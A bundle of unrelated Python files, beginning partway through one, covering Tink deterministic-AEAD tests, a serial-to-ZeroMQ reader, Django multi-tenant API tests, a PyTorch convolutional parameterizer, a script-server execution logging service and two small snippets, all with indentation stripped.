wrapped_daead.encrypt_deterministically(b'plaintext',
b'associated_data'),
b'associated_data'), b'plaintext')
def test_decrypt_unknown_ciphertext_fails(self):
unknown_primitive = helper.FakeDeterministicAead(
'unknownFakeDeterministicAead')
unknown_ciphertext = unknown_primitive.encrypt_deterministically(
b'plaintext', b'associated_data')
pset = core.new_primitive_set(daead.DeterministicAead)
primitive, raw_key = self.new_primitive_key_pair(1234, tink_pb2.RAW)
new_primitive, new_key = self.new_primitive_key_pair(5678, tink_pb2.TINK)
pset.add_primitive(primitive, raw_key)
new_entry = pset.add_primitive(new_primitive, new_key)
pset.set_primary(new_entry)
wrapped_daead = core.Registry.wrap(pset)
with self.assertRaisesRegex(core.TinkError, 'Decryption failed'):
wrapped_daead.decrypt_deterministically(unknown_ciphertext,
b'associated_data')
def test_decrypt_wrong_associated_data_fails(self):
primitive, key = self.new_primitive_key_pair(1234, tink_pb2.TINK)
pset = core.new_primitive_set(daead.DeterministicAead)
entry = pset.add_primitive(primitive, key)
pset.set_primary(entry)
wrapped_daead = core.Registry.wrap(pset)
ciphertext = wrapped_daead.encrypt_deterministically(
b'plaintext', b'associated_data')
with self.assertRaisesRegex(core.TinkError, 'Decryption failed'):
wrapped_daead.decrypt_deterministically(ciphertext,
b'wrong_associated_data')
if __name__ == '__main__':
absltest.main()
|
import serial # apt install python-serial
import zmq # apt install python-zmq
from Logger import Logger
import signal
import sys
from time import sleep
class SerialReader():
def __init__(self):
self.connected = False
self.enabled = True
self.baud = 115200
self.zmqOutPort = "10000"
self.mserial = "ttyS4"
self.zmqID = "defaultSerialReader"
self.get_args()
self.logger = Logger(self.zmqID)
zmq_cont = zmq.Context()
self.publisher = zmq_cont.socket(zmq.PUB)
signal.signal(signal.SIGINT, self.sigINT_Handler)
if(self.connect_serial() and self.connect_zmq()):
self.main_loop()
def sigINT_Handler(self, signal, frame):
print (self.zmqID + " detected SigINT signal")
self.logger.save_line("Signal SigINT detected")
self.enabled = False
def deinit(self):
self.publisher.disconnect('tcp://127.0.0.1:'+str(self.zmqOutPort))
self.logger.save_line("Publisher disconnected.")
self.ser.close()
self.logger.save_line("Serial closed.")
self.logger.close()
def get_args(self):
if(len(sys.argv) < 2):
print ("Usage: " + str(sys.argv[0]) + " <PATH TO TTY PORT>" +
"[opt: <BaudRate> <ZMQPort> <ID>]" )
print ("Secondary use: " + str(sys.argv[0])
+ " <PATH TO RAW LOGFILE>")
sys.exit(0)
if(len(sys.argv) >= 2):
self.mserial = sys.argv[1]
if(sys.argv[1].find("/dev/") >= 0):
#normal run from physical device
self.normalRun = True
elif(sys.argv[1].find("Logs/") >= 0):
# Run from LOG
self.normalRun = False
if(len(sys.argv) >= 3):
self.baud = int(sys.argv[2])
if(len(sys.argv) >= 4):
self.zmqOutPort = str(sys.argv[3])
if(len(sys.argv) >= 5):
self.zmqID = str(sys.argv[4])
print("Settings -> Serial: " + self.mserial + " speed: "
+ str(self.baud) + " ZMQ port: " + self.zmqOutPort
+ " serial ID: " + str(self.zmqID))
def connect_serial(self):
if not self.connected:
try:
self.ser = serial.Serial(self.mserial, self.baud)
self.ser.bytesize = serial.EIGHTBITS
self.ser.parity = serial.PARITY_NONE
self.ser.stopbits = serial.STOPBITS_ONE
self.disconected = False
print( "Connected to " + self.mserial)
if(self.ser.readable()):
self.ser.flush()
self.ser.readline()
return True
except:
print( "Failed connecting to " + self.mserial)
return False
else:
return True
def connect_zmq(self):
try:
self.publisher.bind('tcp://127.0.0.1:'+str(self.zmqOutPort))
self.logger.save_line("Binded to local port: " + self.zmqOutPort)
self.publisher.send_string(self.zmqID + " binded on port "
+ self.zmqOutPort)
except:
self.logger.save_line("Failed to bind localPort "
+ self.zmqOutPort)
return False
sleep(0.5)
return True
def main_loop(self):
while self.enabled:
if(self.ser.readable()):
line = self.ser.readline()
self.logger.save_line("Incomming msg: <"+line+">")
self.publisher.send_string(line)
sleep(0.001)
self.deinit()
B = SerialReader()
|
import urllib
from model_mommy import mommy
from django.contrib.contenttypes.models import ContentType
from django.shortcuts import reverse
from django.test import override_settings
from tests.utils import SharedSchemaTenantsAPITestCase
from exampleproject.lectures.models import Lecture
from shared_schema_tenants.helpers.tenants import set_current_tenant
from shared_schema_tenants_custom_data.models import (
TenantSpecificTable, TenantSpecificFieldDefinition)
from shared_schema_tenants_custom_data.serializers import (
TenantSpecificFieldDefinitionCreateSerializer)
from shared_schema_tenants_custom_data.helpers.custom_tables_helpers import (
get_custom_table_manager, _get_pivot_table_class_for_data_type)
class CustomTablesListTests(SharedSchemaTenantsAPITestCase):
def setUp(self):
super(CustomTablesListTests, self).setUp()
self.tables = mommy.make('shared_schema_tenants_custom_data.TenantSpecificTable',
tenant=self.tenant, _quantity=10)
for table in self.tables:
self.fields = mommy.make(
'shared_schema_tenants_custom_data.TenantSpecificFieldDefinition', table_id=table.id,
table_content_type=ContentType.objects.get_for_model(TenantSpecificTable),
data_type=TenantSpecificFieldDefinition.DATA_TYPES.integer, default_value='1',
tenant=self.tenant, _quantity=10)
for table in self.tables:
self.row = mommy.make(
'shared_schema_tenants_custom_data.TenantSpecificTableRow', table=table, tenant=self.tenant)
for i, field in enumerate(self.fields):
PivotTableClass = _get_pivot_table_class_for_data_type(field.data_type)
PivotTableClass.objects.filter(
row_id=self.row.id, definition=field
).update(value=i + 5)
self.client.force_authenticate(self.user)
self.view_url = reverse('shared_schema_tenants_custom_data:custom_tables_list')
validator_gt_2 = mommy.make(
'shared_schema_tenants_custom_data.TenantSpecificFieldsValidator',
module_path='shared_schema_tenants_custom_data.tests.validators.validator_gt_2')
self.params = {
'name': '_custom_tables__test_table_1',
'fields_definitions': [
{
'name': 'test1',
'data_type': 'integer',
'is_required': False,
'default_value': 3,
'validators': [validator_gt_2.id]
},
{
'name': 'test2',
'data_type': 'integer',
'is_required': False,
'default_value': 1,
'validators': []
}
]
}
def test_correct_number_of_tables(self):
response = self.client.get(
self.view_url, HTTP_TENANT_SLUG=self.tenant.slug)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data), 10)
@override_settings(
SHARED_SCHEMA_TENANTS_CUSTOM_DATA={
'CUSTOMIZABLE_MODELS': ['lectures.Lecture']
}
)
def test_correct_number_of_tables_with_customizable_models(self):
response = self.client.get(
self.view_url, HTTP_TENANT_SLUG=self.tenant.slug)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data), 11)
@override_settings(
SHARED_SCHEMA_TENANTS_CUSTOM_DATA={
'CUSTOMIZABLE_MODELS': ['lectures.Lecture']
}
)
def test_search_results_correctly(self):
get_params_dict = {
'search': 'lecture',
}
try:
get_params = urllib.parse.urlencode(get_params_dict, doseq=True)
except AttributeError:
get_params = urllib.urlencode(get_params_dict, doseq=True)
response = self.client.get(
self.view_url + '?' + get_params, HTTP_TENANT_SLUG=self.tenant.slug)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data), 1)
@override_settings(
SHARED_SCHEMA_TENANTS_CUSTOM_DATA={
'CUSTOMIZABLE_MODELS': ['lectures.Lecture']
}
)
def test_filters_custom_tables_results_correctly(self):
get_params_dict = {
'filter': '_custom_tables',
}
try:
get_params = urllib.parse.urlencode(get_params_dict, doseq=True)
except AttributeError:
get_params = urllib.urlencode(get_params_dict, doseq=True)
response = self.client.get(
self.view_url + '?' + get_params, HTTP_TENANT_SLUG=self.tenant.slug)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data), 10)
@override_settings(
SHARED_SCHEMA_TENANTS_CUSTOM_DATA={
'CUSTOMIZABLE_MODELS': ['lectures.Lecture']
}
)
def test_filters_customizable_models_results_correctly(self):
get_params_dict = {
'filter': 'customizable_models',
}
try:
get_params = urllib.parse.urlencode(get_params_dict, doseq=True)
except AttributeError:
get_params = urllib.urlencode(get_params_dict, doseq=True)
response = self.client.get(
self.view_url + '?' + get_params, HTTP_TENANT_SLUG=self.tenant.slug)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data), 1)
@override_settings(
SHARED_SCHEMA_TENANTS_CUSTOM_DATA={
'CUSTOMIZABLE_MODELS': ['lectures.Lecture']
}
)
def test_paginate_results_correctly(self):
get_params_dict = {
'page': 2,
'length': 4,
}
try:
get_params = urllib.parse.urlencode(get_params_dict, doseq=True)
except AttributeError:
get_params = urllib.urlencode(get_params_dict, doseq=True)
response = self.client.get(
self.view_url + '?' + get_params, HTTP_TENANT_SLUG=self.tenant.slug)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['count'], 11)
self.assertEqual(len(response.data['results']), 4)
def test_create(self):
response = self.client.post(
self.view_url, self.params, format='json', HTTP_TENANT_SLUG=self.tenant.slug)
self.assertEqual(response.status_code, 201)
set_current_tenant(self.tenant.slug)
tables = TenantSpecificTable.objects.all()
self.assertEqual(tables.count(), 11)
new_table = tables.get(name=response.data['name'].split('__')[1])
self.assertEqual(new_table.fields_definitions.count(), 2)
@override_settings(
SHARED_SCHEMA_TENANTS_CUSTOM_DATA={
'CUSTOMIZABLE_MODELS': ['lectures.Lecture']
}
)
class CustomTablesDetailsTests(SharedSchemaTenantsAPITestCase):
def setUp(self):
super(CustomTablesDetailsTests, self).setUp()
self.tables = mommy.make('shared_schema_tenants_custom_data.TenantSpecificTable',
tenant=self.tenant, _quantity=10)
for table in self.tables:
fields = mommy.make(
'shared_schema_tenants_custom_data.TenantSpecificFieldDefinition', table_id=table.id,
table_content_type=ContentType.objects.get_for_model(TenantSpecificTable),
data_type=TenantSpecificFieldDefinition.DATA_TYPES.integer, default_value='1',
tenant=self.tenant, _quantity=10)
self.row = mommy.make(
'shared_schema_tenants_custom_data.TenantSpecificTableRow', table=table, tenant=self.tenant)
for i, field in enumerate(fields):
PivotTableClass = _get_pivot_table_class_for_data_type(
field.data_type)
PivotTableClass.objects.filter(
row_id=self.row.id, definition=field
).update(value=i + 5)
self.lecture_fields = mommy.make(
'shared_schema_tenants_custom_data.TenantSpecificFieldDefinition',
table_content_type=ContentType.objects.get_for_model(Lecture),
data_type=TenantSpecificFieldDefinition.DATA_TYPES.integer, default_value='1',
tenant=self.tenant, _quantity=10)
self.custom_table_view_url = reverse(
'shared_schema_tenants_custom_data:custom_tables_details',
kwargs={'slug': '_custom_tables__' + self.tables[0].name})
self.customizable_model_view_url = reverse(
'shared_schema_tenants_custom_data:custom_tables_details',
kwargs={'slug': 'lectures__lecture'})
self.client.force_authenticate(self.user)
self.validator_gt_2 = mommy.make(
'shared_schema_tenants_custom_data.TenantSpecificFieldsValidator',
module_path='shared_schema_tenants_custom_data.tests.validators.validator_gt_2')
self.params = {
'name': '_custom_tables__test_table_1',
'fields_definitions': [
{
'name': 'test1',
'data_type': 'integer',
'is_required': False,
'default_value': 1,
'validators': []
},
{
'name': 'test2',
'data_type': 'integer',
'is_required': False,
'default_value': 1,
'validators': [self.validator_gt_2.id]
}
]
}
def test_retrieves_custom_table_correctly(self):
response = self.client.get(
self.custom_table_view_url, HTTP_TENANT_SLUG=self.tenant.slug)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['name'], '_custom_tables__' + self.tables[0].name)
self.assertEqual(len(response.data['fields_definitions']), 10)
def test_retrieves_customizable_model_correctly(self):
response = self.client.get(
self.customizable_model_view_url, HTTP_TENANT_SLUG=self.tenant.slug)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['fields_definitions']), 10)
self.assertEqual(
TenantSpecificFieldDefinition.original_manager.filter(
table_content_type=ContentType.objects.get_for_model(Lecture),
tenant=self.tenant
).count(), 10)
def test_updates_custom_table_correctly(self):
updated_definitions = TenantSpecificFieldDefinitionCreateSerializer(
self.tables[0].fields_definitions.first()).data
params = {
'name': self.params['name'],
'fields_definitions': self.params['fields_definitions'] + [updated_definitions]
}
response = self.client.put(
self.custom_table_view_url, params, format='json',
HTTP_TENANT_SLUG=self.tenant.slug)
set_current_tenant(self.tenant.slug)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['fields_definitions']), 3)
self.assertEqual(self.tables[0].fields_definitions.count(), 3)
def test_updates_customizable_model_correctly(self):
updated_definitions = TenantSpecificFieldDefinitionCreateSerializer(
self.lecture_fields[0]).data
params = {
'fields_definitions': self.params['fields_definitions'] + [updated_definitions]
}
response = self.client.put(
self.customizable_model_view_url, params, format='json',
HTTP_TENANT_SLUG=self.tenant.slug)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['fields_definitions']), 3)
self.assertEqual(
TenantSpecificFieldDefinition.original_manager.filter(
table_content_type=ContentType.objects.get_for_model(Lecture),
tenant=self.tenant
).count(), 3)
def test_destroys_custom_table_correctly(self):
response = self.client.delete(self.custom_table_view_url, HTTP_TENANT_SLUG=self.tenant.slug)
self.assertEqual(response.status_code, 200)
self.assertFalse(TenantSpecificTable.objects.filter(id=self.tables[0].id).exists())
self.assertEqual(
TenantSpecificFieldDefinition.original_manager.filter(
table_id=self.tables[0].id,
table_content_type=ContentType.objects.get_for_model(TenantSpecificTable),
tenant=self.tenant
).count(), 0)
def test_destroys_customizable_model_correctly(self):
response = self.client.delete(
self.customizable_model_view_url, format='json',
HTTP_TENANT_SLUG=self.tenant.slug)
self.assertEqual(response.status_code, 200)
self.assertEqual(
TenantSpecificFieldDefinition.original_manager.filter(
table_content_type=ContentType.objects.get_for_model(Lecture),
tenant=self.tenant
).count(), 0)
class TenantSpecificTableRowViewsetTests(SharedSchemaTenantsAPITestCase):
def setUp(self):
super(TenantSpecificTableRowViewsetTests, self).setUp()
self.table = mommy.make('shared_schema_tenants_custom_data.TenantSpecificTable', tenant=self.tenant)
self.fields = mommy.make(
'shared_schema_tenants_custom_data.TenantSpecificFieldDefinition', table_id=self.table.id,
table_content_type=ContentType.objects.get_for_model(TenantSpecificTable),
data_type=TenantSpecificFieldDefinition.DATA_TYPES.integer, default_value='1',
tenant=self.tenant, _quantity=10)
self.row = mommy.make(
'shared_schema_tenants_custom_data.TenantSpecificTableRow', table=self.table, tenant=self.tenant)
for i, field in enumerate(self.fields):
PivotTableClass = _get_pivot_table_class_for_data_type(field.data_type)
PivotTableClass.objects.filter(row_id=self.row.id, definition=field).update(value=i + 5)
self.client.force_authenticate(self.user)
self.list_view_url = reverse(
'shared_schema_tenants_custom_data:custom_data_list',
kwargs={
'slug': '_custom_tables__' + self.table.name,
})
self.details_view_url = reverse(
'shared_schema_tenants_custom_data:custom_data_details',
kwargs={
'slug': '_custom_tables__' + self.table.name,
'pk': self.row.id,
})
def test_list(self):
response = self.client.get(
self.list_view_url, HTTP_TENANT_SLUG=self.tenant.slug)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data), 1)
def test_create(self):
params = {}
for i, field in enumerate(self.fields):
params[field.name] = 1 + 1000
response = self.client.post(
self.list_view_url, params, format='json', HTTP_TENANT_SLUG=self.tenant.slug)
self.assertEqual(response.status_code, 201)
set_current_tenant(self.tenant.slug)
self.assertEqual(get_custom_table_manager(self.table.name).all().count(), 2)
def test_create_invalid(self):
params = {}
for i, field in enumerate(self.fields):
if i == 0:
validator_lt_2 = mommy.make(
'shared_schema_tenants_custom_data.TenantSpecificFieldsValidator',
module_path='shared_schema_tenants_custom_data.tests.validators.validator_lt_2')
field.validators.add(validator_lt_2)
params[field.name] = 1 + 1000
response = self.client.post(
self.list_view_url, params, format='json', HTTP_TENANT_SLUG=self.tenant.slug)
self.assertEqual(response.status_code, 400)
def test_retrieve(self):
response = self.client.get(
self.details_view_url, HTTP_TENANT_SLUG=self.tenant.slug)
self.assertEqual(response.status_code, 200)
def test_update(self):
params = {}
for i, field in enumerate(self.fields):
params[field.name] = 1 + 1000
response = self.client.put(
self.details_view_url, params, format='json', HTTP_TENANT_SLUG=self.tenant.slug)
self.assertEqual(response.status_code, 200)
set_current_tenant(self.tenant.slug)
for key, value in params.items():
self.assertEqual(
getattr(get_custom_table_manager(self.table.name).get(id=self.row.id), key),
value)
class LecturesViewSetTests(SharedSchemaTenantsAPITestCase):
def setUp(self):
super(LecturesViewSetTests, self).setUp()
self.validator_gt_2 = mommy.make(
'shared_schema_tenants_custom_data.TenantSpecificFieldsValidator',
module_path='shared_schema_tenants_custom_data.tests.validators.validator_gt_2')
self.lecture_fields = mommy.make(
'shared_schema_tenants_custom_data.TenantSpecificFieldDefinition',
table_content_type=ContentType.objects.get_for_model(Lecture),
data_type=TenantSpecificFieldDefinition.DATA_TYPES.integer, default_value='1',
tenant=self.tenant, validators=[self.validator_gt_2], _quantity=2)
lecture_fields_values = {
lf.name: i + 100
for i, lf in enumerate(self.lecture_fields)
}
self.lecture = mommy.make('lectures.Lecture', **lecture_fields_values)
self.list_view_url = reverse('lectures:list')
self.details_view_url = reverse(
'lectures:details', kwargs={'pk': self.lecture.pk})
self.client.force_authenticate(self.user)
self.params = {
'subject': "Test",
'description': ("Lorem ipsum dolor sit amet consectetur adipisicing elit. "
"Recusandae, qui? Voluptate reprehenderit vel mollitia, "
"placeat et aperiam sit voluptatibus eum deserunt corrupti "
"nulla quidem nesciunt atque dicta, accusantium ipsam at?"),
'speaker': self.user.id,
}
self.params.update({f.name: i + 1000 for i, f in enumerate(self.lecture_fields)})
def test_list(self):
response = self.client.get(
self.list_view_url, HTTP_TENANT_SLUG=self.tenant.slug)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data), 1)
self.assertIn(self.lecture_fields[0].name, response.data[0].keys())
self.assertIn(self.lecture_fields[1].name, response.data[0].keys())
def test_retrieve(self):
response = self.client.get(
self.details_view_url, HTTP_TENANT_SLUG=self.tenant.slug)
self.assertEqual(response.status_code, 200)
def test_create(self):
response = self.client.post(
self.list_view_url, self.params, format='json', HTTP_TENANT_SLUG=self.tenant.slug)
self.assertEqual(response.status_code, 201)
set_current_tenant(self.tenant.slug)
new_lecture = Lecture.objects.get(id=response.data['id'])
for key, value in self.params.items():
if key != 'speaker':
self.assertEqual(getattr(new_lecture, key), value)
else:
self.assertEqual(getattr(new_lecture, key).pk, value)
def test_create_invalid(self):
self.params[self.lecture_fields[0].name] = -100
response = self.client.post(
self.list_view_url, self.params, format='json', HTTP_TENANT_SLUG=self.tenant.slug)
self.assertEqual(response.status_code, 400)
def test_update(self):
response = self.client.put(
self.details_view_url, self.params, format='json', HTTP_TENANT_SLUG=self.tenant.slug)
self.assertEqual(response.status_code, 200)
set_current_tenant(self.tenant.slug)
updated_lecture = Lecture.objects.get(id=response.data['id'])
for key, value in self.params.items():
if key != 'speaker':
self.assertEqual(getattr(updated_lecture, key), value)
else:
self.assertEqual(getattr(updated_lecture, key).pk, value)
|
import torch
import torch.nn as nn
class ConvParameterizer(nn.Module):
""" Convolutional Parameterizer for DiSENN model
Generates parameters as relevance scores for concepts.
Follows the same architecture as the VAE Conceptizer's encoder module.
Architecture
------------
Conv: 32 channels, 4x4
Conv: 32 channels, 4x4
Conv: 32 channels, 4x4
Conv: 32 channels, 4x4
FC: 256 neurons
FC: 256 neurons
FC: num_concepts + num_classes
"""
def __init__(self, num_concepts: int, num_classes: int):
""" Init ConvParameterizer
Parameters
----------
num_concepts: int
Number of concepts for which relevance scores must be generated
num_classes: int
Number of classes to be classifed in the downstream task
"""
super().__init__()
in_channels = 3
h_channels = 32
kernel_size = 4
h_dim = 256
self.num_concepts = num_concepts
self.num_classes = num_classes
self.conv_block = nn.Sequential(
nn.Conv2d(in_channels, h_channels, kernel_size, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(h_channels, h_channels, kernel_size, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(h_channels, h_channels, kernel_size, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(h_channels, h_channels, kernel_size, stride=2, padding=1),
nn.ReLU()
)
self.fc_block = nn.Sequential(
nn.Linear((h_channels * kernel_size * kernel_size), h_dim),
nn.ReLU(),
nn.Linear(h_dim, h_dim),
nn.ReLU()
)
# final layer to generate the parameters for each concept and class
self.concept_class_layer = nn.Linear(h_dim, (num_concepts * num_classes))
def forward(self, x: torch.Tensor):
""" Generates relevance scores as parameters for concepts
Parameters
----------
x: torch.Tensor
input tensor of shape (batch_size, 3, 64, 64)
Returns
-------
parameters: torch.Tensor
relevance scores for concepts as parameters of shape (batch_size, num_concepts, num_classes)
"""
assert len(x.shape)==4 and x.shape[2]==64 and x.shape[3]==64,\
"input must be of shape (batch_size x 3 x 64 x 64)"
batch_size = x.shape[0]
x = self.conv_block(x)
x = x.view(batch_size, -1)
x = self.fc_block(x)
x = self.concept_class_layer(x)
return x.view(batch_size, self.num_concepts, self.num_classes)
|
# noinspection PyBroadException
import logging
import os
import re
from string import Template
from execution.execution_service import ExecutionService
from model.model_helper import AccessProhibitedException
from utils import file_utils, audit_utils
from utils.audit_utils import get_audit_name
from utils.collection_utils import get_first_existing
from utils.date_utils import get_current_millis, ms_to_datetime
ENCODING = 'utf8'
OUTPUT_STARTED_MARKER = '>>>>> OUTPUT STARTED <<<<<'
LOGGER = logging.getLogger('script_server.execution.logging')
class ScriptOutputLogger:
def __init__(self, log_file_path, output_stream):
self.opened = False
self.closed = False
self.output_stream = output_stream
self.log_file_path = log_file_path
self.log_file = None
self.close_callback = None
def start(self):
self._ensure_file_open()
self.output_stream.subscribe(self)
def _ensure_file_open(self):
if self.opened:
return
try:
self.log_file = open(self.log_file_path, 'wb')
except:
LOGGER.exception("Couldn't create a log file")
self.opened = True
def __log(self, text):
if not self.opened:
LOGGER.exception('Attempt to write to not opened logger')
return
if not self.log_file:
return
try:
if text is not None:
self.log_file.write(text.encode(ENCODING))
self.log_file.flush()
except:
LOGGER.exception("Couldn't write to the log file")
def _close(self):
try:
if self.log_file:
self.log_file.close()
except:
LOGGER.exception("Couldn't close the log file")
self.closed = True
if self.close_callback:
self.close_callback()
def on_next(self, output):
self.__log(output)
def on_close(self):
self._close()
def write_line(self, text):
self._ensure_file_open()
self.__log(text + os.linesep)
def set_close_callback(self, callback):
if self.close_callback is not None:
LOGGER.error('Attempt to override close callback ' + repr(self.close_callback) + ' with ' + repr(callback))
return
self.close_callback = callback
if self.closed:
self.close_callback()
class HistoryEntry:
def __init__(self):
self.user_name = None
self.user_id = None
self.start_time = None
self.script_name = None
self.command = None
self.id = None
self.exit_code = None
class ExecutionLoggingService:
def __init__(self, output_folder, log_name_creator, authorizer):
self._output_folder = output_folder
self._log_name_creator = log_name_creator
self._authorizer = authorizer
self._visited_files = set()
self._ids_to_file_map = {}
self._output_loggers = {}
file_utils.prepare_folder(output_folder)
self._renew_files_cache()
def start_logging(self, execution_id,
user_name,
user_id,
script_name,
command,
output_stream,
all_audit_names,
start_time_millis=None):
if start_time_millis is None:
start_time_millis = get_current_millis()
log_filename = self._log_name_creator.create_filename(
execution_id, all_audit_names, script_name, start_time_millis)
log_file_path = os.path.join(self._output_folder, log_filename)
log_file_path = file_utils.create_unique_filename(log_file_path)
output_logger = ScriptOutputLogger(log_file_path, output_stream)
output_logger.write_line('id:' + execution_id)
output_logger.write_line('user_name:' + user_name)
output_logger.write_line('user_id:' + user_id)
output_logger.write_line('script:' + script_name)
output_logger.write_line('start_time:' + str(start_time_millis))
output_logger.write_line('command:' + command)
output_logger.write_line(OUTPUT_STARTED_MARKER)
output_logger.start()
log_filename = os.path.basename(log_file_path)
self._visited_files.add(log_filename)
self._ids_to_file_map[execution_id] = log_filename
self._output_loggers[execution_id] = output_logger
def write_post_execution_info(self, execution_id, exit_code):
filename = self._ids_to_file_map.get(execution_id)
if not filename:
LOGGER.warning('Failed to find filename for execution ' + execution_id)
return
logger = self._output_loggers.get(execution_id)
if not logger:
LOGGER.warning('Failed to find logger for execution ' + execution_id)
return
log_file_path = os.path.join(self._output_folder, filename)
logger.set_close_callback(lambda: self._write_post_execution_info(log_file_path, exit_code))
def get_history_entries(self, user_id, *, system_call=False):
self._renew_files_cache()
result = []
for file in self._ids_to_file_map.values():
history_entry = self._extract_history_entry(file)
if history_entry is not None and self._can_access_entry(history_entry, user_id, system_call):
result.append(history_entry)
return result
def find_history_entry(self, execution_id, user_id):
self._renew_files_cache()
file = self._ids_to_file_map.get(execution_id)
if file is None:
LOGGER.warning('find_history_entry: file for %s id not found', execution_id)
return None
entry = self._extract_history_entry(file)
if entry is None:
LOGGER.warning('find_history_entry: cannot parse file for %s', execution_id)
elif not self._can_access_entry(entry, user_id):
message = 'User ' + user_id + ' has no access to execution #' + str(execution_id)
LOGGER.warning('%s. Original user: %s', message, entry.user_id)
raise AccessProhibitedException(message)
return entry
def find_log(self, execution_id):
self._renew_files_cache()
file = self._ids_to_file_map.get(execution_id)
if file is None:
LOGGER.warning('find_log: file for %s id not found', execution_id)
return None
file_content = file_utils.read_file(os.path.join(self._output_folder, file),
keep_newlines=True)
log = file_content.split(OUTPUT_STARTED_MARKER, 1)[1]
return _lstrip_any_linesep(log)
def _extract_history_entry(self, file):
file_path = os.path.join(self._output_folder, file)
correct_format, parameters_text = self._read_parameters_text(file_path)
if not correct_format:
return None
parameters = self._parse_history_parameters(parameters_text)
return self._parameters_to_entry(parameters)
@staticmethod
def _read_parameters_text(file_path):
parameters_text = ''
correct_format = False
with open(file_path, 'r', encoding=ENCODING) as f:
for line in f:
if _rstrip_once(line, '\n') == OUTPUT_STARTED_MARKER:
correct_format = True
break
parameters_text += line
return correct_format, parameters_text
def _renew_files_cache(self):
cache = self._ids_to_file_map
obsolete_ids = []
for id, file in cache.items():
path = os.path.join(self._output_folder, file)
if not os.path.exists(path):
obsolete_ids.append(id)
for obsolete_id in obsolete_ids:
LOGGER.info('Logs for execution #' + obsolete_id + ' were deleted')
del cache[obsolete_id]
for file in os.listdir(self._output_folder):
if not file.lower().endswith('.log'):
continue
if file in self._visited_files:
continue
self._visited_files.add(file)
entry = self._extract_history_entry(file)
if entry is None:
continue
cache[entry.id] = file
@staticmethod
def _create_log_identifier(audit_name, script_name, start_time):
audit_name = file_utils.to_filename(audit_name)
date_string = ms_to_datetime(start_time).strftime("%y%m%d_%H%M%S")
script_name = script_name.replace(" ", "_")
log_identifier = script_name + "_" + audit_name + "_" + date_string
return log_identifier
@staticmethod
def _parse_history_parameters(parameters_text):
current_value = None
current_key = None
parameters = {}
for line in parameters_text.splitlines(keepends=True):
match = re.fullmatch('([\w_]+):(.*\r?\n)', line)
if not match:
current_value += line
continue
if current_key is not None:
parameters[current_key] = _rstrip_once(current_value, '\n')
current_key = match.group(1)
current_value = match.group(2)
if current_key is not None:
parameters[current_key] = _rstrip_once(current_value, '\n')
return parameters
@staticmethod
def _parameters_to_entry(parameters):
id = parameters.get('id')
if not id:
return None
entry = HistoryEntry()
entry.id = id
entry.script_name = parameters.get('script')
entry.user_name = parameters.get('user_name')
entry.user_id = parameters.get('user_id')
entry.command = parameters.get('command')
exit_code = parameters.get('exit_code')
if exit_code is not None:
entry.exit_code = int(exit_code)
start_time = parameters.get('start_time')
if start_time:
entry.start_time = ms_to_datetime(int(start_time))
return entry
@staticmethod
def _write_post_execution_info(log_file_path, exit_code):
file_content = file_utils.read_file(log_file_path, keep_newlines=True)
file_parts = file_content.split(OUTPUT_STARTED_MARKER + os.linesep, 1)
parameters_text = file_parts[0]
parameters_text += 'exit_code:' + str(exit_code) + os.linesep
new_content = parameters_text + OUTPUT_STARTED_MARKER + os.linesep + file_parts[1]
file_utils.write_file(log_file_path, new_content.encode(ENCODING), byte_content=True)
def _can_access_entry(self, entry, user_id, system_call=False):
if entry is None:
return True
if entry.user_id == user_id:
return True
if system_call:
return True
return self._authorizer.has_full_history_access(user_id)
class LogNameCreator:
def __init__(self, filename_pattern=None, date_format=None) -> None:
self._date_format = date_format if date_format else '%y%m%d_%H%M%S'
if not filename_pattern:
filename_pattern = '${SCRIPT}_${AUDIT_NAME}_${DATE}'
self._filename_template = Template(filename_pattern)
def create_filename(self, execution_id, all_audit_names, script_name, start_time):
audit_name = get_audit_name(all_audit_names)
audit_name = file_utils.to_filename(audit_name)
date_string = ms_to_datetime(start_time).strftime(self._date_format)
username = audit_utils.get_audit_username(all_audit_names)
mapping = {
'ID': execution_id,
'USERNAME': username,
'HOSTNAME': get_first_existing(all_audit_names, audit_utils.PROXIED_HOSTNAME, audit_utils.HOSTNAME,
default='unknown-host'),
'IP': get_first_existing(all_audit_names, audit_utils.PROXIED_IP, audit_utils.IP),
'DATE': date_string,
'AUDIT_NAME': audit_name,
'SCRIPT': script_name
}
filename = self._filename_template.safe_substitute(mapping)
if not filename.lower().endswith('.log'):
filename += '.log'
filename = filename.replace(" ", "_").replace("/", "_")
return filename
class ExecutionLoggingController:
def __init__(self, execution_service: ExecutionService, execution_logging_service):
self._execution_logging_service = execution_logging_service
self._execution_service = execution_service
def start(self):
execution_service = self._execution_service
logging_service = self._execution_logging_service
def started(execution_id):
script_config = execution_service.get_config(execution_id)
script_name = str(script_config.name)
audit_name = execution_service.get_audit_name(execution_id)
owner = execution_service.get_owner(execution_id)
all_audit_names = execution_service.get_all_audit_names(execution_id)
output_stream = execution_service.get_anonymized_output_stream(execution_id)
audit_command = execution_service.get_audit_command(execution_id)
logging_service.start_logging(
execution_id,
audit_name,
owner,
script_name,
audit_command,
output_stream,
all_audit_names)
def finished(execution_id):
exit_code = execution_service.get_exit_code(execution_id)
logging_service.write_post_execution_info(execution_id, exit_code)
self._execution_service.add_start_listener(started)
self._execution_service.add_finish_listener(finished)
def _rstrip_once(text, char):
if text.endswith(char):
text = text[:-1]
return text
def _lstrip_any_linesep(text):
if text.startswith('\r\n'):
return text[2:]
if text.startswith(os.linesep):
return text[len(os.linesep):]
return text
|
def add_objects (a,b):
if type(a) == int and type(b) == int:
return print((a + b))
return print("Enter integer values")
add_objects (3,6)
|
from collections import namedtuple
Story = namedtuple('Story', ('id', 'title', 'link', 'hn_link', 'top_comments'))
|
